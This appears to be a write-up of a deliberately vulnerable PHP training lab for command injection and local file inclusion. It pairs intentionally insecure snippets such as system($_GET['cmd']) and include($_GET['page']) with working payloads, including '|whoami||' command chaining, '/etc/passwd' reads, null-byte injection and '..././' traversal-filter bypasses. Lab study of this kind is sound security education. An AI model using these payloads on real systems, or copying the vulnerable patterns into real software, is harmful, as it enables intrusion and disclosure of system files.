Paralax LFI Lab

We can learn Command Injection and Local File Inclusion in this lab. The author collected various types of vulnerabilities.

Github Project

download or clone following repository

https://github.com/paralax/lfi-labs

CMD -1

Source Code

<?php
    system($_GET["cmd"]);
?>

Small Explanation

system() -> Execute Strings as Command
$_GET['cmd'] -> Handling user input with GET method -> file.php?cmd=<user_input>

Exploiting

?cmd=whoami  ( We can use "whoami" on Windows OS or Linux )

POC

CMD -2

Source Code

<?php
    system($_POST["cmd"]);
?>

Small Explanation

system() -> Execute Strings as Command
$_POST['cmd'] -> Handling user input with POST method

Exploiting

POC

 

CMD-3

Source Code

<?php
    system("/usr/bin/whois " . $_GET["domain"]);
 ?>

If you are using Windows , you should change “/usr/bin/whois” to “nslookup”.

Small Explanation

system execute -> nslookup google.com
Result -> 
Server:  UnKnown
Address:  192.168.43.1

Name:    google.com
Addresses:  2404:6800:4001:806::200e
	  216.58.196.14

We need to escape from nslookup command. Techniques from OWASP testing guide.

cmd1|cmd2  : Uses of | will make command 2 to be executed weather command 1 execution is successful or not.
cmd1;cmd2  : Uses of ; will make command 2 to be executed weather command 1 execution is successful or not.
cmd1||cmd2  : Command 2 will only be executed if command 1 execution fails.
cmd1&&cmd2 : Command 2 will only be executed if command 1 execution succeeds.
$(cmd) : For example, echo $(whoami) or $(touch test.sh; echo 'ls' > test.sh)
'cmd' : It's used to execute specific command. For example, 'whoami'
>(cmd): <(ls)
<(cmd): >(ls)

POC

CMD-4

Source Code

<?php
    system("whois " . $_POST["domain"]);
 ?>

Small Explanation

Its only change between GET method and POST method from CMD-3

POC

 

CMD-5

Source Code

<?php
if (preg_match('/^[-a-z0-9]+\.a[cdefgilmnoqrstuwxz]|b[abdefghijmnorstvwyz]|c[acdfghiklmnoruvxyz]|d[ejkmoz]|e[cegrstu]|f[ijkmor]|g[abdefghilmnpqrstuwy]|h[kmnrtu]|i[delmnoqrst]|j[emop]|k[eghimnprwyz]|l[abcikrstuvy]|m[acdeghklmnopqrstuvwxyz]|n[acefgilopruz]|om|p[aefghklmnrstwy]|qa|r[eosuw]|s[abcdeghijklmnortuvyz]|t[cdfghjklmnoprtvwz]|u[agksyz]|v[aceginu]|w[fs]|y[et]|z[amw]|biz|cat|com|edu|gov|int|mil|net|org|pro|tel|aero|arpa|asia|coop|info|jobs|mobi|name|museum|travel|arpa|xn--[a-z0-9]+$/', strtolower($_GET["domain"])))
        { system("whois -h " . $_GET["server"] . " " . $_GET["domain"]); } 
    else 
        {echo "malformed domain name";}
    
 ?>

Small Explanation

$_GET['domain'] has been filtered 
We need to care about all inputs if not even shown in input box.
$_GET['server'] is another input

Escaping

Command -> whois -h [server] [domain]  

Input ->        ?domain=facebook.com&server=127.0.0.1

Command ->whois -h 127.0.0.1 facebook.com

Escaping -> ?domain=facebook.com&server=127.0.0.1|whoami||

Command->whois -h 127.0.0.1|whoami|| facebook.com

| -> only work second command
|| -> work if first command failed

POC

CMD-6

Its only change between GET method and POST method from CMD-5

 

LFI-1

Source Code

<?php
include($_GET["page"]);
?>

Small Explanation

include() -> execute code from file
$_GET['page'] -> User input usin GET method

Exploitation

?page=C:/Windows/system.ini ( Windows )
?page=/etc/passwd ( Linux )

POC

LFI-2

Source Code

<?php
include("includes/".$_GET['library'].".php"); 
?>

Small Explaination

prefix -> includes/
Directory Traversal - > cd .. -> ../ 
Nullbyte Injection -> %00 -> Terminator

Exploitation

../readme.md%00

Nullbyte fixed in 5.3.8 ( Detail )

But dont worry , we can open php file

library=../../../info

We need allow_url_fopen=On for Remote File Inclusion

POC

LFI-3

Source Code

<?php
if (substr($_GET['file'], -4, 4) != '.php')
 echo file_get_contents($_GET['file']);
else
 echo 'You are not allowed to see source files!'."\n";
?>

Small Explaination

Filtered exfiltration with .php extension
We can bypass this .ph<

POC

Source Code

LFI-4

Source Code

<?php
include('includes/class_'.addslashes($_GET['class']).'.php');
?>

Small Explaination

includes/class_<input>.php

includes/class_aaa/../../../../info

POC

LFI-5

Source Code

<?php
   $file = str_replace('../', '', $_GET['file']);
   if(isset($file))
   {
       include("pages/$file");
   }
   else
   {
       include("index.php");
   }
?>

Small Explaination

../ has been deleted with str_replace()
Obufscating Result -> ..././ -> ../

POC

LFI-6 to LFI -10

Its only changes between GET and POST method

 

LFI-11

Source Code

<form action="/LFI-11/index.php" method="POST">
    <input type="text" name="file">
    <input type="hidden" name="style" name="stylepath">
</form>

<?php include($_POST['stylepath']); ?>

Small Explaination

We need to test hidden parameter
stylepath=C:/Windows/system.ini

POC

LFI-12

Changed only GET from 11

POC

LFI-13

Same with LFI-5
..././..././..././info.php

POC

LFI-14

changed from POST to GET method